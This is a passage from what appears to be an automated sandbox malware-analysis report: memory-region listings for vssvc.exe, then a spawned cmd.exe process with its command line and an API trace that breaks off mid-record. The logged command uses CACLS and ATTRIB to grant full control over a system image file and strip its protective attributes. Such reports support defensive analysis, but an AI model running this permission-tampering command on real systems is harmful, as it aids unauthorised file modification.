= pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 25239 start_va = 0x600000 end_va = 0x6fcfff entry_point = 0x600000 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 25240 start_va = 0x700000 end_va = 0xaf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 25241 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 25242 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 25243 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 25244 start_va = 0xda0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 25245 start_va = 0xde0000 end_va = 0x10aefff entry_point = 0xde0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25246 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 25247 start_va = 0x1280000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 25248 start_va = 0x6e2c0000 end_va = 0x6e2c6fff entry_point = 0x6e2c0000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 25249 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25250 start_va = 0x6e450000 end_va = 0x6e45ffff entry_point = 0x6e450000 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 25251 start_va = 0x6e950000 end_va = 0x6e963fff entry_point = 0x6e950000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 25252 start_va = 0x6e970000 end_va = 0x6e9aafff entry_point = 0x6e970000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 25253 start_va = 0x6f8f0000 end_va = 0x6f8f7fff entry_point = 0x6f8f0000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 25254 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 25255 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 25256 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 25257 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 25258 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 25259 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 25260 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 25261 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 25262 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25263 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25264 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 25265 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 25266 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 25267 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25268 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25269 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 25270 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25271 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 25272 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25273 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25274 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25275 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25276 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 25277 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25278 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25279 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25280 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25281 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25282 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25283 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25284 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25285 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 25286 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25289 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25290 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25291 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25292 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25293 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 25294 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25295 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25296 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25297 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25298 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25299 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25300 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 25301 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 25302 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 25461 start_va = 0x6dab0000 end_va = 0x6db2afff entry_point = 0x6dab0000 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 25462 start_va = 0x6e2a0000 end_va = 0x6e2a9fff entry_point = 0x6e2a0000 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Region: id = 25463 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Thread: id = 461 os_tid = 0xc1c Thread: id = 462 os_tid = 0xcdc Thread: id = 463 os_tid = 0xc3c Thread: id = 464 os_tid = 0xd38 Thread: id = 465 os_tid = 0xd00 Thread: id = 466 os_tid = 0xcd4 Thread: id = 467 os_tid = 0xa18 Thread: id = 486 os_tid = 0xd74 Thread: id = 608 os_tid = 0xfbc Thread: id = 942 os_tid = 0xf34 Process: id = "338" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25306 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25307 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25311 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 25312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25437 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25438 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25439 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25440 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 25441 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 25442 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25443 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25444 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25445 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25446 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25447 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25448 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25449 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25450 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25451 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 25452 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25453 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25454 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25455 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 25456 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 25457 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 25458 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 25459 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 25460 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 25464 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 468 os_tid = 0x46c [0181.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd34 | out: lpSystemTimeAsFileTime=0x1cfd34*(dwLowDateTime=0xa10d8700, dwHighDateTime=0x1d440a9)) [0181.445] GetCurrentProcessId () returned 0xcfc [0181.445] GetCurrentThreadId () returned 0x46c [0181.445] GetTickCount () returned 0x340b7 [0181.445] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd2c | out: lpPerformanceCount=0x1cfd2c*=23823404962) returned 1 [0181.446] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0181.446] __set_app_type (_Type=0x1) [0181.446] __p__fmode () returned 0x76b331f4 [0181.446] __p__commode () returned 0x76b331fc [0181.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0181.446] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0181.446] GetCurrentThreadId () returned 0x46c [0181.446] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x46c) returned 0x38 [0181.446] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.446] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0181.446] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.446] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0181.447] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfcc4 | out: phkResult=0x1cfcc4*=0x0) returned 0x2 [0181.447] VirtualQuery (in: lpAddress=0x1cfcfb, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0181.447] GetConsoleOutputCP () returned 0x1b5 [0181.447] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.447] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0181.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0181.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.447] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.448] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.448] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0181.448] GetEnvironmentStringsW () returned 0x3b0308* [0181.448] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.448] GetEnvironmentStringsW () returned 0x3b0308* [0181.449] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec34 | out: phkResult=0x1cec34*=0x40) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0xb8, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x0, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegCloseKey (hKey=0x40) returned 0x0 [0181.449] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec34 | out: phkResult=0x1cec34*=0x40) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 